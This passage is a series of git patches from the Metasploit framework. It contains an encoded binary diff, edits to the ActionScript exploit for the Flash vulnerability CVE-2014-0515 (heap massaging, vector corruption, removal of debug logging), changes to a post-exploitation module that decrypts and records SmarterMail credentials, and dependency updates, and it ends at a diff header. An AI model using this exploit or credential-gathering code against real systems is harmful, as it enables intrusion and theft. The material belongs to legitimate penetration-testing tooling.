zZb>9RHp~Ek^FfR<(!j`{e{^cJe;>JLU90p2&x8qg86@3&{eKnm59!JM7BIaMDaT#i
z+eT}#Bz^VYS3t~u@|q#x_uC7E)P~$QWn9L$P8a2he~cLk*3>;UdF%L8|5}pm6xGF>
za?-z%uAJgTkNerjB@I28I|vAQpNaFo7-~(Uf_DF-GR_)0=NPt{{n%JayCGlCy2A(C
zmtf0R8&aI$LiK$??|cJ&TFab67n`+x=qlv8`>uoX4C5T_jz&GXX-f<Dwg_ame4nbw
z$?qXdf0<Y~#M;lP+KP026cvmO`tv+4yW-u5msEK3wHw#qkHEB_COar0Ti20gHkz`e
z=-byex3rG@SU8UqOA~3Kv6<bYSmvz1KQRpNL4)V1E98xx(3YrU4OOn)ApZ~#Kv1=9
zAvvc@pBmA)Sskf9DTm-I*xDjI^a6iNi!v>Ge=kw%#vh5u(Xszel!sC@4(YZdMjkq)
z9%n<)hcGr9`~`&QKSMyr+C`Uc^r2jQb}>zx`C%H7uL~%@ljp|3B;>&-!exdZ4wcZ~
z0d_}jzj?OZt*Mz&>f46rr-;t`r*dnsFu*UvqNa7?WDFyvit(D?71U_rEPb)`D({2|
zf9o%P&(NYA)T5n-Kb-psJSX&=A>j`s)wpe~cR6GST6t)_iCTPMoar{S?=4C4Efd$G
z8Pe~g^}!3)-ao3W{|58TrQxEOjoA^=_2*PFbL+TEq1CM?;?;SrF#jrJ;}6Fa&2#_q
zFY5=={8^RKCE(%x;2|5<+PA=nB`?CEe_koLa_)uKqx&MmV&0&{17@AUb7`XEwg+V@
z+Ls9Osd;vA7}W%?K`7&SBNg#NJ*UEg3s9N1Vg)kzFnJj>=Nm$d5OPtW)b$Qt$m(u0
z#S@S(=2@fH%lr1TdjXVM`xa2m4%RrTYPh)z4tIrk9roewQ-C1kgs}L-Sa-JCe>Ch&
zCnN0iNVbtbBHb|N`)j|c{j7G>rYM<m(v*O3Uu@5H=j7EdjTipo1S_Uqx$o_-hKj}-
zAQ%6zf)H1np=KViUVOJU9cI2iJ`Cn(E^e@3VnHhdjRloE`+|cEJST}(rdPM1wl{br
zB>HlXVG}QTX0=^em>R<1D;AoMf8iZ$n^k@djVKrS#i&<|G%c}J21|-v+_ld$xvt!?
z`h}jLuI)7-4=9pbdjFvz7z%2_C38Z_5j)<U6=Qs=i#^|4fl{7oVe7GCKd}ckjZl5O
z{4E0_=wNM>PA6_9iG=g@CfJYnMN$jh<3!J=jDT^xPA+qZqE*ge?g+D{f5Eqzchs3t
zIZmr2l2v`rdPYc7&ZktI>|%l~)b_;)gdIjNXhlm5uWetmjNZlpauWgpE(hp*kMW=#
zpH%EZ^ShNb{6xpI2bo9^m8VRiCHawj)W&`LW^9|+dJieDvPFp}C2+ja`_+>z%|+zG
z{GTHFgZrC11?8#?0hue<e-k9*=xl7d4J?ENZcwlri|*w(5Q*NnHpynuW!BVWfydff
zGQtqa#InS0zORBlJTq7{zw0q^F;S+@1YS_y*r{R0Bcb=M@#<FXelq{caG6PXz>LSU
zkH=+!YCyl71`K`%v^w^(FQI^c7#+wi29sdZMu~-x-B{y3ly&cVe{IHl)GU@j{PQu2
zL)neZW^iBfTv)-Xb3Q*=z=T~OV9A9J?o!uo`i&xl5(gfr^q<>QN|Az^i+DLc>hKSZ
z1J}Y-jC;wysg<VBMn<w(?A)8Oa%V+@h0%N$F~(jb27$2$Z?@*pC)iz7Y6g7>n_5!c
zMz5i8suxY_`GRe{f2hP=lgG3PE&|}9<-9j`k!PmMsyyGOu|LO9oEK^4>qZ1qOjI<b
zX-2wcQt0Xg{;w?GWE8$|TUY)9x)^~jJI^WxVispi<Vc4rnsWJ9`Ut5UtQ)<#>biHn
z_9?YMn<AY#ptnkR_<4kCIT5GJzH+c_oHX_asD%{ee4g~6e?lv#!-wK8q|F}62)@NM
z7Ob2*_Zyq@3(6ubKOJ%<=T&8QJ}PsC^^@NN=d>F+m+b)zIIN40M{=n#Zu2!Pzb;Y3
z7uP3sdEAO56zs%TG?FL>aeF7Rzz64SsrkEWXKroP=WlPQ5;0%OSV%Ikf<SF+joKdH
z1^NZVK`+dHe{v2zX5qn^Hw*N^EgthMRWLd0aYPdp0u!H!fr8r-$<tG8{p`~@!F0+5
z3B+=@ZL^ine7)$-Wr5{Sz4g#>ZFy0_6i>LrFIfWqpUgNVl;-C1QvHlrH5(;Ac1$fN
zsMI6#g^JJHwgwm*-^UPj+E%U9B7erB?$lSo?eWtnf0^=j$i+pg*4)v$j5K2Y-YLmT
z<h<EGUruSAE;(rypyAc7UfwE)S~Y5t!7f|g;Bq9({cb&^QF+yERfq3yA}9ok6C0?!
zgaf8yIQ(hZxP<aEoLkB(%k`xP+)ZfFpe2Tp!Vr_`f2{QC;D^#|+C<*n%SNLe=HlsI
zp$1eje~XvP*$;ldim{g)O&y2Rc=|yazFJe%TTMpr%*KVNkm<K1C%Qhchu){0?y}G$
zN8?i+o%f<zDpq(PQFjbS-r}GY6U}Ysw#Km;1C|ULm1Z>rJ0y&uiZKX2d1YY4@p(fB
z#QVrbUvrhBw?VKUl|aK$e<GE{M_(T@rxXCUe?|D)B$R65srolw=a}x-Hq=p{SYe9X
z9fxu$^^!wsfNXhelX+UxU9td{46Q0rOfyha#y+tx6e6=RE9%QzBuh8%=i)lFvUTU=
z62MS6@2ZXPyCD;z1&3ArG3>G|$^R~Tc1$x-mLx<xa3}5y3k`pHAL1E`DV5px)@UKn
zf01LFl-<MEp~1hE?$!ASVg}a*TxT942U2=S!g^bp)12thETS`S+DYRy7-SX9f|-%*
zwq|%0Df`NK7U6DgdV>)<FPK^IrFsO!lx(NUrY_Hy)ZUV8>J44MQNh{&IvvSz0SE?C
zs`gFJZmK&ATh)bI4Ac>5MEBD&&OoTIe+<bc8G)ueJw3Zu_j~OrvLKPrv1825*Y{og
zV_J+z8_P1Y$cZSh;2KC~GiJTKp&j*eeI}uFZ1<vK=Euz%>T=7OSeJn<1Xt)VoU$Pa
zkl7~I=Qa0Ti@)wCizmSF$67|yXak8@$jqu;pYNe*2B|P<1eVepv>4>ia<l}pf6+7}
zRu3Yoqc&$8Mp$BRLNY<p-kT~9NbVOkW5zBw?v7#|#SOL^IFQ#DX&{eF4=Bo@&rdY!
zfK4)(h?;?>90EcQnKyuc0IUGyQ<KmUR;@pVX(2^~3PxL+MZUJ)D|<oqo#a=Mh8w-$
zDDJDEb`$-_lsQvAyYY*a=7Time`&aF_3b_k@|ui%H{PfyThd(3$8AzJvR&Jm<q7E8
zM_I!RzeS=v@iM}W2B%(=A+`wnx3%{@#4kK1<{fGYWfer<CQP36y69!0MXI8-uLf{V
z|FesthP_+(hzjCmZawnj=nH_Ae8#!XTCHc{gj)e6<6}8<9-jXdLvGUyf8vty^{9!`
zfyj{|Kj1ZsYX0NaPe-oh15)5x#0u<|gS2>n)PD8Ef$`t7AHl9Z!nM`NyiS>W2~jDH
zwapS48P>_Lg;-T=8OgiblXy(>PTQ8XIB+j&j2(XA{&gXwu|8!ca8RXIyLr~+BL-q6
zRBoW92J|@C5^#3}YV;Anf4N1tbAd?!GXlo{#EzkBYschH%M;!NBXW$r&_D4<#-991
zn=n4xAY_b*PVZs6$lW$C4ixeKrR@I%OFHJ1(JO-FEtGNhzCU>CpTly|Daut+cA`n5
zn5!l60E|dk2R3%Q{JeyoJ#WnZAKpe@qujNI3ve|I-exB0D$uivf7`4{@5ir-s%%03
zMIPgHnbBMtru2GSp8o=B=<MI(sIc^QKKY<VsV+=wBmfYTXpXf<Vuh}F6n|Ap1j{D|
zEwcx@tU^eyyoHV&{Kn<8Tm}chXQ$k|5x3y?wfr8Ap&KWRT|#J}MwzWfp-H_}NO#<J
zM1cnmUYp$-c-#3Qe`K7Pp}$}q-?_}t>m&e+8h`8ErVJX82WCJYMw-vU8-Z8xAV@Hi
zURbT_TgWU|yJ<+{k^5WgtiFH%r~kmU9#u)tM-}i*>-#D|_kPF~7C+i0OgU^o6xUM$
z75^l6{0!Qv%*7ewH=~iFC*K^0LQvq1bHTiHEr3ECaS$Nqf3n3UdK(d_1nQ>cX2*-l
zSzG`TH|Mq>1kXuvcWP$2@FOwSF59C3<Z0JipQ5c@#WGam;q6^Z)|=Jc;e0vQy(i;7
z$`DXIdS?P88VD?lPTD<HIV6Rc`L?ukHR7?o%n><1OwCj^Ant0a?j!*!JX>Zlc&lDM
zWE+DOh<$Q_e><8nkrprkun$>Q?XSg1fVFJx6VPC-FKLqIKl|V|ODfwG{UOz6M8cZR
zQm|CME?i5O*n0ii(3t*e)e`}{Z+`^@yuiV{7WiveTv`_9w>Gi4{Ye&G_`(hgv*$JO
zFRfs~Ovupwa3RtgDeT&I)`WOtge~5&p>c@{@~{E56H4p{mw$Z7NX}{>pQ+LJh4D<q
z;%H_u1NZ(+3;Si9<TvNB#+YFWz(2wJ^Hz-N*Y7n-dr&8h4r&1si^K96LJr;F6T{oL
zS|-?}{jYIRy2uISf72j+e;T&0Q!J6iQVPSI{$-S{)}DG`{eO<j7nU<MH6seKiKNa!
zZJt9}cjD<w)qjd_$-~DM#*=N=4ltq(!?_?Z^hiFjMkpdP7=N+kPrAjK&1w$m6fQZJ
zPA~^jZRV-r76?JR-ovz1N)(n`Pr)yS6FfJ9Z_?5=HZY;f#vn47KPsKC%?DvAp2xQY
z+8Fe{tqBFUE;8r_=Z*@p$DEcylj6gB^g-i_;K@Z?rhn-)3C>44te=hzwz%ePnMHi&
z<|YyepMT5<b-@bNvXn8Oof=~Su3T4bx3~jfVCCO~l*ALGkq?m%G$Ue@K6%8Z>f&bu
ziVJmeI05UtRL1(&f~F9zZ)HFqbuB@Q-gcWv?zo#6uXujCYmF_M?B$^qT3$m_Xm1Ht
z`kA0DP=DZ&W7g_MLeTtc09e&9<60S|4$+pNMygpp&&4wB9MzXl5Fg`=L8!NRVTtk3
zW&=r*(;ezKEw^3>CmA6vwtK%6AJWH-MF}p`yN{J7Hi&{mmlQ-WRl$#ULZvh;UdKWT
z!^CR-Bj4A+Th!&ZuPER@BS0?(Ms@9E;9{eCxPQ2rBXDdwQV1vKx3T1#)K)7!T~v&i
zx?*_QpxjZ4uM|HwAfgbkQA{Wyny_p+1T>n$27ko&)a3~3z1O&_aj~S==kIXC@bE1E
zs|l<F@yf<<(-1;@v6KukNxKM?Q}3-}V&Cjoo99RSI**VICv3+foZKeeKTzUHtE|nf
zYkwHEEe=bU87KE>R9{!2%}4N7OtQ2rb5Nw?p@-J`<++$#fAv#lAlP7(^m1Ti0-TPl
z);>I^>3Q87z8r`v51!j#jn);aBo@*;Exk<j_s{DpHJ7qYt#~9HpoUrg=z>>TIGOa2
z`m%-C5;+Ckh8Vs#x&RorF7btb9XTv0UVk<#&S`O6(K4XW6gl26?v%s7Xs_<z$eE)*
zvcIFC=Mam^6vOshNl~%qs5sRVC`-M4I6DyD`Vt(-A>0{sJd|;SO#p{G^N%X{EeORR
zYDf@br8?GLWZSwK3gJj~_KcHi7Av7rJLV7dD3P&gHAYrr_A1xW@C-+IN!Jq2gnyK7
zc>sV2I}WD{RodSaxZbMTkZF<wAOv0jnv@=YdDNzGNa076!DX2>IMB*=kj5I@)WGnJ
z@ez(DJEW%_Zs+*|lmBv!9+`qJ{Bo$sy)>=BPEy_B^Wn$pyx-SZd1DIA#c-6kI><vf
zJzX|D$YmJBJmnA4ODcRH)S-rfHh;CW*IADL_K55^tTi4wBe^5{i(6Ub9^MEJP;EgD
zIeCnbA8x6>x;(4iL^YfzKEbID!AT6*G<Ry`r0QiSmXb2`M(7FL+>9@1Go*WYTR-EQ
zkz<I)(-#1q#zDIL5ZC3&S?e7yKWVLF_J$-m_SpeZ3x+qg36U?^1T<}g;eU?Z{(Km6
zgu5tsGrIrqaaZ|SIb#p4V{ReZ^})*ToJ=u@UinAfmh7aE#eEFbXhHa+IgpR-63n6;
zU6j_&)7Wz6wN&-k5cQbbzYxH5%4ABX3Iue!q1*s8{@Qql>k`zWVUEaT5pd(j*OUjZ
zq4-Y&YO?|X1myIxAs5cT_<xn{#^j({4V)plb5kG#PkS^piOnqh6S*WE<AVxUpx#VS
z4m30x7_6yp4Hs9r-o<hw)>W2+$RM&uJh1J<p24Y$Bic#%&F&81VA!v{m~g|psw`3*
zUOk7{JS?&1vm!k+FFqxHuoO-)9?Y<PK0T<{MaSX3DqT~!v0#q>#DBPGKgDjjV(Q6a
z)WTlxZY?-`zIW342@ljwj`f(X$+R$}n3^1IaQV74_*kxR;&HJ7H2CpRwlN>i*<PLL
zk+!i{DD0)8T17hZ|G;U&ImyX%`*m`nUD`CqUkgPEA@A4ofnNxVa^wC8P`oXb{xvWd
z#e47`Q@?z}%uBtW>3@j9TELaY=sP9SCh`I|orxBh%?3viV&mGBM!6+(GT>dcmH4S)
zvKBPg$FqktJAK%I6o#k$O<O9`XGeB8IWN9qC_7G67H5o!g+6cT=kv%ccsZdpLo9Q5
z6gq4uD2n9qdF7<lI05dsvJ38e!Th&TZrtw-8WAtVXOoh9BYz>!yhlPLG~ywuoHB&=
zl?}0A6e04w6M&cAx)tnOC&s>yfRJlWmP?222Q<*IWGJHf+xG?Lq>I=oW5Syfq4`8x
zSXpU08-OFO&C5fjRvMG%pD11E91%)NInq#G+9?^BTT`6QTv2kD`K`}_(MqmA7Vq7n
z;%!)=ydvZMjDI4rdZsV{<MZ){%H}Bn?JBYScmquCD~5=t>%uim4|1Q1*afj@mY~_3
z)=rZ$_XY%mawS=3(srt@h`i}TYmTs&!e$eIZ>I988A22d5!p=bfcrE`gIa4XKqn3u
zK$z6BcKz({X*(5584{@K<ZOS6Mt#~>8zQbLS2n6HyMOZZ*`#rH`GNIv6|Pap{9&f4
zob81fH>l^(vJncq<pe;*3fPXmPJl`H3Kv3ecrKS}^<D8rR`?PXZfl8$D4v@!Ie%q=
zfD}X)OaqNLMO1If2Jn(V;|#6=)Kj&GD>7NO>+S?X|16K^l)sLFA6wn1C$Cv6+Ux5<
z2Xe`4+kX|(DBqLMYO>OO(0D40`9jlj>&;;fATRS$Ju0bPz`P+Co)obA6v(;1UrYJ!
z3eV+m)qzSq+eLlgpyF<d)-H?XzVhpbtD;#}6&!qm`^;4AMk=NU*-!#owze@;NlaNY
zg9}8_ZZ^ULcg`khK<adTo88yCCmY+qTuCFGzkg`-^+2`WZ@yEn96<CxWN!01t#+$#
zV<-`i3D|@H{oRzZqBj#DYcL%SL!5TI)T}{aijN$)aos*8@*#7!HA+J1!HB|tvsEfZ
zTv>Y^AWtH0+Tbx1I76d4n*SCv(&4>W)mI(<U5^fuG;KuG+;ky>rK&Xu-cGi|G5g;(
z$bYHP>SU9Ve?-rs-K0o(Ic>a$|MG$UoB`<d!&DzN70?2A!=wAxX?{27N%_6_Q9TaW
zOpc_GK2dj@?|vE|bC=g$J0ai7$%}Y0ZY;SYFd>ZYRoRml<k#SlFYX&}`Ee3ju3J%}
zm&+P8shrnBz$=+t8emD03>7&t*TfB8t$$lEFmc!a(I*0EsO$kJKUPO~HYHlfV0P$E
z<^MxA^21zVC`&wt^=%##%|n$HwO*($yM;?h`Jg#nGevH*!W;wEEo3KaBfaICbIX1x
zI?iotT-Z<acN%WF5OSSPj1_z2brI>*sXph+H5SqipQz1a)tVHC8Q?PLSIwDj<bT{q
zO@EttkCd?X<$J}(>}TtUj2Y8+sFJOpxHBkK+Yd*Wl5+hfs3KEW#B)3%HG}pGeGAPO
zw)-o8*h<Yx>C8?hegg@w^5RYfk_SnXJ|E~XBiuS*fz|F}g}k4PC5(YKsJlOzQ$#><
zSJ+xp60~)f<ibPTOXngQ?DflJCx6vL9R<l44=Basz}e>4*+Fs(i+T_Z(9$!PaN6Ux
z0re~+Gv|d{VL?GV-3JaYYl0&8>2}9vgaJNr83%ENI7M+(V$u%2O0~lBW>@t_93t1U
zZlXrbNg1_O+vLX9Svo7M26z=rP)dWY&lzFKNNUhzoaHwWN($@>2u?wI1%FY_4-?9W
z*C&M4pe!%4$j}axEd|2Y9vL?X)xiNRC((+9ZKk4f&bbJ{=VpYM@MYh3eUrv4Yn03d
z|8}|HpY-z-5nELgZUD;pshdemWbYr1Y1wDPo?+#9t>pdeTj~pQr;|<KcnveE&vkiu
zv{S&TJ%?xRK_LxO=mYLYwSQm(5_lCGS<Qn})}=0K^NET-5I5s0%V`qz3oI3B8(TLf
z?P242PxN;jPI0v*&tMiZw5M1;30*p@I%~!|piTR8oe;E&=4_DbfZP8c@EsHm99h;f
zw{qUSsVvI;j@-s%8CarfvHEh5RHE%1w9{FT`pV6Z2$tKS!CQ3FX@A9-sE9WfX_u}K
zAF4Mjz0A;%g*P;edRB8@uj0D^@1zx9Ka+<2jG57BfTYy;U~C0~V<emI5Bu5(N@UJu
zSRk5XfKM+%zDO@t3c14Ddw%3jGD4^&#AnQCzzx;63551+DQuV@PnrF|W2-O{#QYdh
zJC$J>SESH~TE^92wSTFNSq6>6u@%|-&Rh5;YFcS{GoHNR_iQ{uyzCr!Fk~jJi86u~
z2q_B+C~l~<o8SYW`*n8jcHnD2;xjKdo#T2?_w$6gF4(#5cvqu<^s*{dVZQ*z6fA@;
z3Z(V0^X47O58s1k+n}Nm+8~pkIbw-u<+VjJQi0{BO6<@7Sbx-NoV^(`>=_{}lZaI$
z1gk9^bF1L&8&&UuO4tT5NJ;5Sj~%P*E3Y6O1Ga`s>&gWk00Ia&+5He^uhb@VY0&y8
zjrg%IoPyF@k6B}MWn>1eooFGV&v{K&Yv(M2T53P(5gJF<{^2`j3B|4cPrJf#u)bFx
z13cQpWU2E9vVS>tlF>^!GFq?E5umOma2E`>^j3DdrgAA)6l}Am^m)%^NsP#iYrgGp
zc-#I-(l3koxP@3Df}=!s@Wdr;SHdp1k<0AWFQzmEV4k*CJFU0@eE|3{rR|ED1Knyw
zZ9RgX<YGHCEdmNTf!r4vrKY6SiBvle5bs*O+_>?Thkrqu3zH`0dXKp*1O3Ak5;tG<
zVBx75SCVAv>bV9;zwD#Oy0%RWW?l~rb=hF^h7X1Z^p)dQa~k@=Iaxn~ME;f+<NA=4
zD9)Bj987(N0HcTuk>%IoV9##XKQ6E!#;D1U(f~JS1Uu|_l2xB2g`I1d52E*Fx)s^f
z)M!pB`hSEDN4?>Sk|p}sRHLc}qXoiv4Dxx#4mw%WBLY~d*f&jB4_&Vq*GYev#$}CV
z!`tMEZA#G*s3}3<+1l~d!1Yzac6*45#Int*-)*(9tar!&3lUfYIaovgj4~Pl<ONHu
zfC!G*&Va{-TSnpQx$}DZooZNdkFX9QDHZEda(|!Np{<~k*Abw)c_(A>Ee7i@Ngo=|
zxoVy7x=#0l*-)fjyN(4!2Sq-YHIT~}ltHlTn+VVi(MwRrVJWA_5CFO}T2CqAik}RB
z*7_ee#5{O19@y}C<M1;Lv_GE!b4BrTR2B_%O1B_UrKwTqhZo@U^S5PnQFaCgR(|b~
zK7Zy%c8WHl>n%o1){TjdA|IA_hXyb72MpVuS03U5gx+r>!c4YFZQ$<hoe5l#E$O{k
zW$#zoh1QaWLXAEwBzauK9R;K`T}upRAClD|-tNxcx}M|e*HkIX?!bJo_#Ig1N^C9{
zP<>-NffLCFIf5jzVz^zVrrxTugyAyRmVZgi+3qa-qv_Nsxw`L@EAkmKRu4^mmdBn)
zWTl9Z$^Qbo+Q{(edVoLY;|tePpRxj+=&088E2L}V)oye0;jjV}>H6l{XK|2581szY
zC5;E~+nKo;3D(?*#ZvGV0WF?DU9o?R{X#=$4s<>M3|p3H(xXJ<faZcPOZ?iLfq!7R
zkMvUnzol3c-nz@rT(Yxl+ca8ZO?Unhs$**fF0*LW?k&c$D_+Wkvgd)dmm!plk(o14
zIBYa0#cnPPIVR`u)i|5|wHg#G&*@QjHyAYm2>N$0WGL01kwP0e_ad3t`wUfE6vEhl
z5u(VA8yrr2hxbQ?xv!HNAciGMw||*cy}MkJ!~N%qO%wQbm=)lO-s%={KE4Gyc5P7$
zL(U=nTFW4pwZ8!6Nc~`|mgM0y&%2T5YNx&!$%4H7AERwAO`9N~%<)BAo9o5;WmB-q
z9w<qlLz<E{#5$?$X&BSLMp;!$<dW#MbMLG4)SHuQ3vpe>(27Lcz{Db3TYtpb0O&#G
zz;jSy2@PaH!eX7k6m+Q@us1q_&sUTP8*E!=J>z*CBp6`T9oXApa#~!Qwyc+PJ7l<c
z?H!5PkpPO0=nbo+=J>Z<z#&1+b)17*S1^1I*;;ucqD{3=KStER3}>VCx8%;mA=)@{
zMDy966JcY`_VXXHU?<B=27ii>j|NlML`<CV4^;Fn)CeCkVt(FeuFCjSEX^6o!48U`
z2opNBO?yg!@!RZoATw6*RFG@PpvYDO|5uLdrarAh(nG`@@GVFd>X%lC@>fOj4aKA$
zlSe0}>&Ib1c^R0r^YBbFHX0AfC;0z=_JS&^b_V#bO0$uJ*kJ9i-GA}C!5*JFHi#E-
z7tBDiDHB3n32`HB;ZQFA754?-PMdF#goBz@_EhnOK+?ubX>1TBcX8(zcC}%zY{_vr
zGe|wJ-<6mG3}~=I7A>#U48z*)gPWP*XhV(@pb^-PT=qm|nF$iKKfYB@2<w~`JyS~@
zxzcJG!e_PRIV|$+p?~r`=KfQaDsu1tp85}zITB1?i0Cf`U`beWkzbEl{i&`(<S@VH
z&hmh<&wt&wyfeK@F|?>9?Oqezhdng#XWw0~VxUqaa)YosQyZJln>=HBI43s09`!)c
zqAxA^;ZS}K;}RV=8PO4lCn+T1m|DSX4bI~f4sR%lVv(Z~zcT#Vi`c|N`##)f1K=v&
nETmRUqCF?L%IVM96u^;-HCKU{Cm<pvC+7Na^-84w{(iv2<2Hvx

diff --git a/external/source/exploits/CVE-2014-0515/Exploit.as b/external/source/exploits/CVE-2014-0515/Exploit.as
index 7270d46963..7660742210 100755
--- a/external/source/exploits/CVE-2014-0515/Exploit.as
+++ b/external/source/exploits/CVE-2014-0515/Exploit.as
@@ -1,4 +1,6 @@
-//compile with AIR SDK 13.0: mxmlc Exploit.as -o Exploit.swf
+//compile with AIR SDK 13.0: mxmlc Exploit.as -o msf.swf
+// It uses original code from @hdarwin89 for exploitation using ba's and vectors 
+
 package {
 	import flash.display.Sprite
 	import flash.utils.ByteArray
@@ -43,7 +45,6 @@ package {
 			var corrupted_vector_idx:int = -1
             						
 			// Memory massage
-			Logger.log("Memory massage")
 			var array_length:uint = 0x10000
 			var vector_size:uint = 34
 			var array:Array = new Array()
@@ -67,23 +68,14 @@ package {
 			{
 				array[(i - (2 * (j % 2)))].length = 0x0100
 				array[(i - (2 * (j % 2)))][0] = 0xdeedbeef
-				array[(i - (2 * (j % 2)))][1] = 0xdeadbeef
 				array[(i - (2 * (j % 2)))][2] = (i - (2 * (j % 2)))
 				i = (i + 28)
 				j++
 			}
 			
 			// Overflow and Search for corrupted vector
-			Logger.log("Overflow and Search for corrupted vector")
 			var shadba:ByteArray = (new this.Shad() as ByteArray)
-			shadba.position = 232
-			if (Capabilities.os.indexOf("Windows 8") >= 0)
-			{
-				shadba.writeUnsignedInt(2472)
-			}
 			shadba.position = 0
-
-			Logger.log("corrupting")
 			
 			shader = new Shader()
 			try
@@ -103,13 +95,11 @@ package {
 			}
 			
 			if (corrupted_vector_idx == -1) {
-				Logger.log("Exploit - Corrupted vector not found.")
 				return
 			}
 			
 			for(i = 0; i < array[corrupted_vector_idx].length; i++) {
 				if (array[corrupted_vector_idx][i] == 0x0100 && array[corrupted_vector_idx][i + 2] == 0xdeedbeef) {
-					Logger.log("w00t!, found, corrupting ")
 					array[corrupted_vector_idx][i] = 0xffffffff
 					offset = i
 					break
@@ -117,24 +107,25 @@ package {
 			}
 			
 			if (offset == -1) {
-				Logger.log("Exploit - Secondary vector not corrupted")
 				return
 			}
 
 
 			for(i = 0; i < array.length; i++) {
 				if (array[i].length == 0xffffffff) {
-					Logger.log("super corrupted found")
 					uv = array[i]
-					Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
 					uv[0x3ffffffc - offset] = 34
-					Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
 				}
 			}
-			Logger.log('done? Exploiting!')
+
+            for(i = 0; i < array.length; i++) {
+                if (array[i].length != 0xffffffff) {
+                    delete(array[i])
+                    array[i] = null
+                }
+            }
+
             exploiter = new Exploiter(this, platform, os, payload, uv)
-//			uv[0x3ffffffe] = 0x100
-//			Logger.log(uv.length.toString())
 		}
 	}
-}//package 
+} 
diff --git a/external/source/exploits/CVE-2014-0515/Logger.as b/external/source/exploits/CVE-2014-0515/Logger.as
index 61ec768c25..16c0447973 100755
--- a/external/source/exploits/CVE-2014-0515/Logger.as
+++ b/external/source/exploits/CVE-2014-0515/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
  
         public static function alert(msg:String):void
         {

From 20170bd630a6f04d5a14f556c75509b3b0b939e4 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 12 Jun 2015 13:55:32 -0500
Subject: [PATCH 0398/1013] Report as hash

---
 .../post/windows/gather/credentials/smartermail.rb  | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb
index 11f087fda3..5852e0ddab 100644
--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -145,8 +145,11 @@ class Metasploit3 < Msf::Post
     if password
       begin
         result['password'] = decrypt_des(Rex::Text.decode_base64(password))
+        result['password_type'] = :password
       rescue OpenSSL::Cipher::CipherError
         result['password'] = password
+        result['password_type'] = :nonreplayable_hash
+        result['jtr_format'] = 'des'
       end
     end
 
@@ -167,9 +170,15 @@ class Metasploit3 < Msf::Post
       session_id: session_db_id,
       origin_type: :session,
       private_data: opts[:password],
-      private_type: :password,
+      private_type: opts[:password_type],
       username: opts[:user]
-    }.merge(service_data)
+    }
+
+    if opts[:password_type] == :nonreplayable_hash
+      credential_data.merge!(jtr_format: opts['jtr_format'])
+    end
+
+    credential_data.merge!(service_data)
 
     login_data = {
       core: create_credential(credential_data),

From 7baebeea89d84f13d089ee8e13f0c1f32f95eacc Mon Sep 17 00:00:00 2001
From: Trevor Rosen <trevor@catapult-creative.com>
Date: Fri, 12 Jun 2015 14:00:54 -0500
Subject: [PATCH 0399/1013] Update MDM dependency

MSP-12813
---
 Gemfile.lock | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 7248bf82e0..999bd2f902 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -124,7 +124,7 @@ GEM
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
     metasploit-payloads (1.0.2)
-    metasploit_data_models (1.2.1)
+    metasploit_data_models (1.2.2)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       arel-helpers
@@ -139,7 +139,7 @@ GEM
     mini_portile (0.6.2)
     minitest (4.7.5)
     msgpack (0.6.0)
-    multi_json (1.11.0)
+    multi_json (1.11.1)
     multi_test (0.1.2)
     network_interface (0.0.1)
     nokogiri (1.6.6.2)
@@ -174,7 +174,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (10.4.2)
     rb-readline-r7 (0.5.2.0)
-    recog (2.0.4)
+    recog (2.0.5)
       nokogiri
     redcarpet (3.2.3)
     rkelly-remix (0.0.6)

From 89d03a14722457ae4bd94a74dbc3cb3523f19ecd Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 12 Jun 2015 15:02:36 -0500
Subject: [PATCH 0400/1013] Symbol to String

---
 modules/post/windows/gather/credentials/smartermail.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb
index 5852e0ddab..3d342642d2 100644
--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -174,7 +174,7 @@ class Metasploit3 < Msf::Post
       username: opts[:user]
     }
 
-    if opts[:password_type] == :nonreplayable_hash
+    if opts['password_type'] == :nonreplayable_hash
       credential_data.merge!(jtr_format: opts['jtr_format'])
     end
 

From a53ca53a6a04a0460ac9a6e4957cb6675770e082 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Fri, 12 Jun 2015 21:23:51 +0100
Subject: [PATCH 0401/1013] Fix inconstancy - multi/handler

---
 .../browser/persits_xupload_traversal.rb      |   2 +-
 .../windows/mssql/mssql_linkcrawler.rb        |  22 +--
 .../post/multi/manage/shell_to_meterpreter.rb |  10 +-
 modules/post/multi/manage/system_session.rb   |   6 +-
 .../manage/multi_meterpreter_inject.rb        |   2 +-
 modules/post/windows/manage/payload_inject.rb |   6 +-
 msfcli                                        |   4 +-
 scripts/meterpreter/duplicate.rb              |   2 +-
 scripts/meterpreter/metsvc.rb                 |   4 +-
 scripts/meterpreter/multi_meter_inject.rb     |   2 +-
 scripts/meterpreter/persistence.rb            |   4 +-
 scripts/meterpreter/vnc.rb                    |   4 +-
 scripts/resource/fileformat_generator.rc      | 146 +++++++++---------
 spec/msfcli_spec.rb                           |  12 +-
 14 files changed, 113 insertions(+), 113 deletions(-)

diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb
index 8d96cd5d2b..2441f5ff05 100644
--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
